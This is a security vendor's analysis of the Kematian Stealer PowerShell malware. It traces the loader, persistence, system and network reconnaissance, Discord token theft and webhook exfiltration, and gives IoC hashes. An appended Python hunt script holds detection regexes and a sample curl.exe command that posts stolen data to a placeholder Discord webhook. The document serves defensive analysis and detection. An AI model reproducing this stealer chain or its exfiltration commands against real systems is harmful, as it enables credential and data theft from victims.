Kematian Stealer forked from PowerShell Token Grabber
By K7 Labs, July 2, 2024 (updated September 3, 2024)
Categories: PowerShell, Stealer, Trojan

Stealers are a widespread threat, giving threat actors access to a wealth of sensitive data that is exfiltrated to them for further abuse. Kematian Stealer, a PowerShell-based tool, is one such piece of malware. Recently we came across a tweet about Kematian Stealer; the sample it referred to was a PowerShell-based token grabber.

Figure 1: Execution_Flow

Binary Analysis

Let us now analyse the malware in depth. The binary is a 64-bit portable executable that acts as a loader. The loader, written in C++, carries an obfuscated script in its resource section.

Figure 2: Resource-Blob

The malware extracts the resource blob named "112E9CAC33494A35D3547F4B3DCD2FD5" and decrypts it; the decrypted content is a batch file.

Figure 3: Decryption_Loop

The loop above decrypts the blob mentioned earlier; the algorithm is likely RC4.

Figure 4: Decrypted_Script

After decryption, the loader tries to run the batch file with elevated privileges.

Figure 5: Bat_File (am_admin)

The batch file, which contains the PowerShell script, is then executed. On execution, the script checks whether it is running with administrative privileges. If not, it prompts the user to run it with elevated privileges; only once it has them does it move on to the next function.

Figure 6: Check_If_Admin

It then runs the task function, which provides persistence via the Windows Task Scheduler. First it copies the PowerShell script into the %AppData% folder under the filename percs.ps1.

Figure 7: Task_Creation

The script checks whether the directory, file and task already exist before creating them. This prevents the conflicts that would arise if multiple instances ran simultaneously, which could cause system instability or alert the user to unusual behaviour. It then moves on to the data collection function, called Grub.

Data collection

The Grub function contains the main stealer code, which focuses on system configuration and network environment information. It begins by obtaining the system's public IP with the web request "Invoke-WebRequest -Uri https://api.ipify.org" and stores the result in a text file, ip.txt, in the user's local application data directory ("%LOCALAPPDATA%\Temp\ip.txt").

Figure 8: IP_Stealer

It then collects system information using the Windows command line: PowerShell executes systeminfo.exe, which retrieves details such as the OS version, host name and system model. The output is redirected to a text file named system_info.txt at "%LOCALAPPDATA%\Temp\system_info.txt".

Figure 9: System_Info_stealer

After collecting the system information and public IP, it retrieves the system UUID and MAC addresses via WMI and stores them in the text files uuid.txt and mac.txt at "%LOCALAPPDATA%\Temp\uuid.txt" and "%LOCALAPPDATA%\Temp\mac.txt".

Figure 10: UUID_stealer
Figure 11: MAC_Stealer

Next it collects the current username and hostname from the system environment variables.

Figure 12: User & Host

Finally, it gathers netstat information using the Windows command line: the PowerShell script executes NETSTAT.exe to retrieve network statistics such as active connections and listening ports with their associated process IDs.

Figure 13: Netstat_Stealer

The script then constructs a detailed, formatted message to be sent to a Discord channel via a webhook. The message includes the victim's system information (IP, username, hostname, UUID, MAC address) formatted as fields, plus visual elements such as colour, thumbnail and footer to make it more appealing and structured. The script sends this JSON payload in a POST request to the webhook URL specified within it.

Figure 14: Discord_Structure

It then tries to terminate some Discord-related processes and to remove files, such as Discord Token Protector, that could protect against malicious grabbers. To evade detection, it checks for the presence of "Discord token protector.exe" and "secure.dat"; if these files are present in the Discord token directory, the malware removes them.

Figure 15: Discord_Kill

It then checks whether a particular directory exists; if so, it proceeds, otherwise it creates a new directory, "LOCALAPPDATA\Temp\percs".

Figure 16: Downloading_Payload

After creating the directory, it tries to download a payload called main.exe. However, the payload is no longer available at that web page, which redirects to the Kematian Stealer GitHub page instead.

Figure 17: Url_Redirection

At this stage of the analysis we understood that this stealer is a previous version of Kematian Stealer. Initially known as PowerShell-Token-Grabber, it was built by the author KDot227, who has since changed the name to Somali-Devs. Their recent updates mention the author change in the source code, and the old GitHub page redirects to the Kematian Stealer GitHub page.

We obtained main.exe from VirusTotal; it is a Python-based executable. Decompiling it showed that this is where the browser stealer code lives: it focuses mainly on browser cookies, passwords, history and a desktop screenshot.

Figure 18: Targeted_Browsers
Figure 19: Desktop_Grabber

It also targets Discord tokens: it tries to inject code into various Discord clients to capture their tokens, and for this it downloads a JavaScript file by the author KDot227 named injection.js. The targeted clients are:

- Discord
- DiscordCanary
- DiscordPTB
- DiscordDevelopment

Figure 20: Discord_Injection

Data Exfiltration

After collecting all the required data, it moves the collected files from the application data directory to the newly created directory "LOCALAPPDATA\Temp\percs\". It also tries to collect browser cookies and passwords and to take a desktop screengrab; in our analysis it was unable to do so because the web page hosting the payload was not available. Finally it compresses all the text files and zips the data directory.

Figure 21: Stolen_Data

curl.exe is used to transfer the data along with a JSON payload containing the name and content. The grabber exfiltrates all the data to the Discord channel via the webhook.

Figure 22: Data_Compressing

After exfiltration, it clears all traces, including the directories and the collected data.

Figure 23: Deleting_Traces

Comparing this token grabber with the new version of Kematian Stealer, many new features such as a builder and evasion have been added.

New Features

- GUI Builder
- AntiVirus Evasion
- Anti-Analysis
- Extracts WiFi passwords
- Webcam & Desktop screenshot
- Session stealer (Messaging, Gaming, VPN clients, FTP client and more)

As we can see, threat actors keep updating their malware to become more evasive. Compared with other stealers, this one focuses mainly on network-related information, which could be used for active reconnaissance. As the information stolen by the malware is sensitive, protecting yourself by investing in a reputable security product such as K7 AntiVirus is necessary in today's world. We at K7 Labs provide detection for such stealers and all the latest threats.
Users are advised to use a reliable security product such as "K7 Total Security" and keep it up to date to safeguard their devices.

IoCs

File name       Hash                              Detection name
Loader          02F3B7596CFF59B0A04FD2B0676BC395  Trojan-Downloader ( 005a4e961 )
584A.bat        D2EA85153D712CCE3EA2ABD1A593A028  Trojan-Downloader ( 005a4e921 )
PowerShell.ps1  A3619B0A3EE7B7138CEFB9F7E896F168  Trojan ( 0001140e1 )
Main.exe        E06F672815B89458C03D297DB99E9F6B  Trojan ( 005ae5411 )
Injection.js    1CBBFBC69BD8FA712B037EBE37E87709  Trojan ( 00597b5e1 )
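As an added example (not K7 Labs' code or the malware's), the following Python sketch turns the behaviour chain described above into a hunt over constructed process-creation telemetry: it tags each stage (percs.ps1 persistence, the api.ipify.org lookup, systeminfo/netstat output redirected into %LOCALAPPDATA%\Temp, the Temp\percs staging directory, curl.exe posting to a Discord webhook) and flags only hosts where several stages coincide. The event format, the exact command lines, the task name and the webhook placeholder are assumptions.

```python
"""Hunt for the behaviour chain described above over constructed telemetry.
Example code added here (not K7 Labs' or the malware's); the event schema and
the exact command lines are assumptions built from the write-up's artefacts."""
import re
from collections import defaultdict

# One regex per stage. The Discord webhook URL prefix is the public API
# format; the other patterns come from the tools and paths named above.
INDICATORS = {
    "persistence": re.compile(r"percs\.ps1", re.I),        # %AppData%\percs.ps1 and its task
    "public_ip":   re.compile(r"api\.ipify\.org", re.I),   # Invoke-WebRequest for the public IP
    "recon":       re.compile(r"\b(systeminfo|netstat)(\.exe)?\b.*>.*\\Temp\\\w+\.txt", re.I),
    "staging":     re.compile(r"\\Temp\\percs\\?", re.I),  # collection directory
    "exfil":       re.compile(r"\bcurl(\.exe)?\b.*discord(app)?\.com/api/webhooks", re.I),
}

# Constructed sample telemetry (host, command line): WS01 replays the chain, WS02 is benign noise.
SAMPLE_EVENTS = [
    ("WS01", r'schtasks /create /tn Updater /tr "powershell -File %AppData%\percs.ps1" /sc onlogon'),
    ("WS01", r'powershell -Command "Invoke-WebRequest -Uri https://api.ipify.org"'),
    ("WS01", r"cmd /c systeminfo > C:\Users\bob\AppData\Local\Temp\system_info.txt"),
    ("WS01", r"cmd /c netstat -ano > C:\Users\bob\AppData\Local\Temp\netstat.txt"),
    ("WS01", r'curl.exe -F "file=@C:\Users\bob\AppData\Local\Temp\percs\data.zip" '
             r"https://discord.com/api/webhooks/<WEBHOOK_ID>/<TOKEN>"),  # placeholder URL
    ("WS02", "powershell -Command Get-Process"),
    ("WS02", "curl.exe https://example.com/update.json"),
]

def hunt(events):
    """Map each host to the sorted list of chain stages seen in its command lines."""
    hits = defaultdict(set)
    for host, cmdline in events:
        for tag, rx in INDICATORS.items():
            if rx.search(cmdline):
                hits[host].add(tag)
    return {host: sorted(tags) for host, tags in hits.items()}

def flag_hosts(events, min_tags=3):
    """Alert only when several stages appear on one host, so a lone curl.exe or
    systeminfo run does not page anyone; the threshold is a tuning choice."""
    return sorted(h for h, tags in hunt(events).items() if len(tags) >= min_tags)

if __name__ == "__main__":
    for host, tags in hunt(SAMPLE_EVENTS).items():
        print(host, tags)
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

Feeding real EDR or Sysmon process-creation records into hunt() only requires mapping them onto (host, command line) pairs; the regexes themselves are deliberately narrow to the artefacts this write-up documents.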